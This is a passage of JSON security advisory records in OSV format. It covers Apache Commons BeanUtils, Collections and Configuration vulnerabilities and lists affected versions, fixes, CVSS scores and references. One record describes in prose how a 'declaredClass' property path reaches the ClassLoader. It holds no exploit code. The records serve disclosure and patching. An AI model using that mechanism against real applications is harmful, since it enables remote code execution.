"https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3Cissues.activemq.apache.org%3E" 
}, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f@%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/BEANUTILS-463" }, { "type": "WEB", "url": 
"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05324755" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-beanutils" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938" }, { "type": "WEB", "url": "https://access.redhat.com/solutions/869353" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2995" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30@%3Cissues.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3Cissues.activemq.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3Cissues.commons.apache.org%3E" }, { "type": "WEB", "url": "http://advisories.mageia.org/MGASA-2014-0219.html" }, { "type": "WEB", "url": "http://apache-ignite-developers.2346864.n4.nabble.com/CVE-2014-0114-Apache-Ignite-is-vulnerable-to-existing-CVE-2014-0114-td31205.html" }, { "type": "WEB", "url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136958.html" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2014/06/15/10" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2014/07/08/1" }, { "type": 
"WEB", "url": "http://seclists.org/fulldisclosure/2014/Dec/23" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674128" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674812" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675266" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675387" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675689" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675898" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675972" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676110" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677110" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042296" }, { "type": "WEB", "url": "http://www.debian.org/security/2014/dsa-2940" }, { "type": "WEB", "url": "http://www.ibm.com/support/docview.wss?uid=swg21675496" }, { "type": "WEB", "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:095" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "type": "WEB", "url": 
"http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2014-0008.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2014-0012.html" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-10T23:37:42Z", "nvd_published_at": "2014-04-30T10:49:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-wxr5-93ph-8wr9", "published": "2025-05-28T15:34:34Z", "modified": "2025-11-03T22:02:52.251771Z", "aliases": [ "CVE-2025-48734" ], "related": [ "CGA-4m3v-9fm7-3827", "CGA-4vxj-ffhj-xx7v", "CGA-6294-j3wv-p997", "CGA-65c9-4g2c-373p", "CGA-833r-vwc8-62f8", "CGA-h6g7-pxcx-m22q", "CGA-h73m-gfrj-3j4v", "CGA-hg4r-wggg-wv2r", "CGA-jqx3-wwgp-2r3g", "CGA-mh8p-6rr9-xrhf", "CGA-q9p5-pgm4-hw27", "CGA-wrw4-qfp6-7h6x", "CGA-xrg4-fgj3-f9vq" ], "summary": "Apache Commons Improper Access Control vulnerability", "details": "Improper Access Control vulnerability in Apache Commons.\n\n\n\nA special BeanIntrospector class was added in version 1.9.2. This can be used to stop attackers from using the declared class property of Java enum objects to get access to the classloader. However this protection was not enabled by default. PropertyUtilsBean (and consequently BeanUtilsBean) now disallows declared class level property access by default.\n\n\n\n\n\nReleases 1.11.0 and 2.0.0-M2 address a potential security issue when accessing enum properties in an uncontrolled way. 
If an application using Commons BeanUtils passes property paths from an external source directly to the getProperty() method of PropertyUtilsBean, an attacker can access the enum’s class loader via the “declaredClass” property available on all Java “enum” objects. Accessing the enum’s “declaredClass” allows remote attackers to access the ClassLoader and execute arbitrary code. The same issue exists with PropertyUtilsBean.getNestedProperty().\nStarting in versions 1.11.0 and 2.0.0-M2 a special BeanIntrospector suppresses the “declaredClass” property. Note that this new BeanIntrospector is enabled by default, but you can disable it to regain the old behavior; see section 2.5 of the user's guide and the unit tests.\n\nThis issue affects Apache Commons BeanUtils 1.x before 1.11.0, and 2.x before 2.0.0-M2.Users of the artifact commons-beanutils:commons-beanutils\n\n 1.x are recommended to upgrade to version 1.11.0, which fixes the issue.\n\n\nUsers of the artifact org.apache.commons:commons-beanutils2\n\n 2.x are recommended to upgrade to version 2.0.0-M2, which fixes the issue.", "affected": [ { "package": { "name": "commons-beanutils:commons-beanutils", "ecosystem": "Maven", "purl": "pkg:maven/commons-beanutils/commons-beanutils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0" }, { "fixed": "1.11.0" } ] } ], "versions": [ "1.0", "1.10.0", "1.10.1", "1.2", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.6.1", "1.7.0", "1.8.0", "1.8.0-BETA", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "1.9.2", "1.9.3", "1.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.10.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-wxr5-93ph-8wr9/GHSA-wxr5-93ph-8wr9.json" } }, { "package": { "name": "org.apache.commons:commons-beanutils2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-beanutils2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": 
"2.0.0-M1" }, { "fixed": "2.0.0-M2" } ] } ], "versions": [ "2.0.0-M1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-wxr5-93ph-8wr9/GHSA-wxr5-93ph-8wr9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48734" }, { "type": "WEB", "url": "https://github.com/apache/commons-beanutils/commit/bd20740da25b69552ddef8523beec0837297eaf9" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-beanutils" }, { "type": "WEB", "url": "https://lists.apache.org/thread/s0hb3jkfj5f3ryx6c57zqtfohb0of1g9" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/06/msg00027.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/05/28/6" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2025-05-28T17:37:18Z", "nvd_published_at": "2025-05-28T14:15:34Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6hgm-866r-3cjv", "published": "2020-06-15T20:36:20Z", "modified": "2024-11-28T05:40:45.267146Z", "aliases": [ "CVE-2015-6420" ], "summary": "Insecure Deserialization in Apache Commons Collection", "details": "Serialized-object interfaces in Java applications using the Apache Commons Collections (ACC) library may allow remote attackers to execute arbitrary commands via a crafted serialized Java object.", "affected": [ { "package": { "name": "org.apache.commons:commons-collections4", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-collections4" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1" } ] } ], "versions": [ "4.0" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } }, { "package": { "name": "commons-collections:commons-collections", "ecosystem": "Maven", "purl": "pkg:maven/commons-collections/commons-collections" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.2.2" } ] } ], "versions": [ "1.0", "2.0", "2.0.20020914.015953", "2.0.20020914.020746", "2.0.20020914.020858", "2.1", "2.1.1", "3.0", "3.0-dev2", "3.1", "3.2", "3.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } }, { "package": { "name": "net.sourceforge.collections:collections-generic", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.collections/collections-generic" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "4.0.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.collections-generic", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.collections-generic" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "4.01" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.commons-collections", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.commons-collections" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": 
"3.2.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-6hgm-866r-3cjv/GHSA-6hgm-866r-3cjv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-6420" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-collections" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05376917" }, { "type": "WEB", "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://www.kb.cert.org/vuls/id/581311" }, { "type": "WEB", "url": "https://www.tenable.com/security/research/tra-2017-14" }, { "type": "WEB", "url": "https://www.tenable.com/security/research/tra-2017-23" }, { "type": "WEB", "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151209-java-deserialization" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/78872" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-11T15:58:44Z", "nvd_published_at": "2015-12-15T05:59:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-fjq5-5j5f-mvxh", "published": "2022-05-13T01:25:20Z", "modified": "2024-02-17T05:22:18.562352Z", "aliases": [ "CVE-2015-7501" ], "summary": "Deserialization of Untrusted Data in Apache commons collections", "details": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. 
A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.", "affected": [ { "package": { "name": "commons-collections:commons-collections", "ecosystem": "Maven", "purl": "pkg:maven/commons-collections/commons-collections" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.2.2" } ] } ], "versions": [ "1.0", "2.0", "2.0.20020914.015953", "2.0.20020914.020746", "2.0.20020914.020858", "2.1", "2.1.1", "3.0", "3.0-dev2", "3.1", "3.2", "3.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } }, { "package": { "name": "org.apache.commons:commons-collections4", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-collections4" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1" } ] } ], "versions": [ "4.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.commons-collections", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.commons-collections" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.2.1" } ] } ], "versions": [ "3.2.1_1", "3.2.1_2", "3.2.1_3" ], "database_specific": { "last_known_affected_version_range": "\u003c 3.2.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } }, { "package": { "name": "net.sourceforge.collections:collections-generic", "ecosystem": "Maven", "purl": "pkg:maven/net.sourceforge.collections/collections-generic" }, "versions": [ "4.01" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.collections-generic", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.collections-generic" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.01" } ] } ], "versions": [ "4.01_1" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.02", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-fjq5-5j5f-mvxh/GHSA-fjq5-5j5f-mvxh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-7501" }, { "type": "WEB", "url": "https://access.redhat.com/security/vulnerabilities/2059393" }, { "type": "WEB", "url": "https://access.redhat.com/solutions/2045023" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534.pdf" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1279330" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-collections/release_4_1.html" }, { "type": "WEB", "url": "https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-collections" }, { "type": "WEB", "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2015-7501" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580." 
}, { "type": "WEB", "url": "https://sourceforge.net/p/collections/code/HEAD/tree" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1773.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-11-03T22:57:31Z", "nvd_published_at": "2017-11-09T17:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pvp8-3xj6-8c6x", "published": "2025-05-09T12:31:33Z", "modified": "2025-05-09T16:27:09.142756Z", "aliases": [ "CVE-2025-46392" ], "summary": "Apache Commons Configuration Uncontrolled Resource Consumption", "details": "Uncontrolled Resource Consumption vulnerability in Apache Commons Configuration 1.x.\n\nThere are a number of issues in Apache Commons Configuration 1.x that allow excessive resource consumption when loading untrusted configurations or using unexpected usage patterns. The Apache Commons Configuration team does not intend to fix these issues in 1.x. Apache Commons Configuration 1.x is still safe to use in scenarios where you only load trusted configurations. \n\nUsers that load untrusted configurations or give attackers control over usage patterns are recommended to upgrade to the 2.x version line, which fixes these issues. 
Apache Commons Configuration 2.x is not a drop-in replacement, but as it uses a separate Maven groupId and Java package namespace they can be loaded side-by-side, making it possible to do a gradual migration.", "affected": [ { "package": { "name": "commons-configuration:commons-configuration", "ecosystem": "Maven", "purl": "pkg:maven/commons-configuration/commons-configuration" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.10" } ] } ], "versions": [ "1.0", "1.0-dev-2.20021231.045254", "1.0-dev-3.20030603.101200", "1.0-dev-3.20030607.194155", "1.0-rc1", "1.0-rc2", "1.1", "1.10", "1.2", "1.2RC1", "1.2RC2", "1.3", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-pvp8-3xj6-8c6x/GHSA-pvp8-3xj6-8c6x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46392" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-configuration" }, { "type": "WEB", "url": "https://lists.apache.org/thread/y1pl0mn3opz6kwkm873zshjdxq3dwq5s" }, { "type": "WEB", "url": "https://www.cve.org/CVERecord?id=CVE-2024-29131" }, { "type": "WEB", "url": "https://www.cve.org/CVERecord?id=CVE-2024-29133" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2025-05-09T15:54:59Z", "nvd_published_at": "2025-05-09T10:15:17Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3832-9276-x7gf", "published": "2022-05-13T01:10:34Z", "modified": "2024-12-06T05:35:03.860614Z", "aliases": [ "CVE-2012-5783" ], 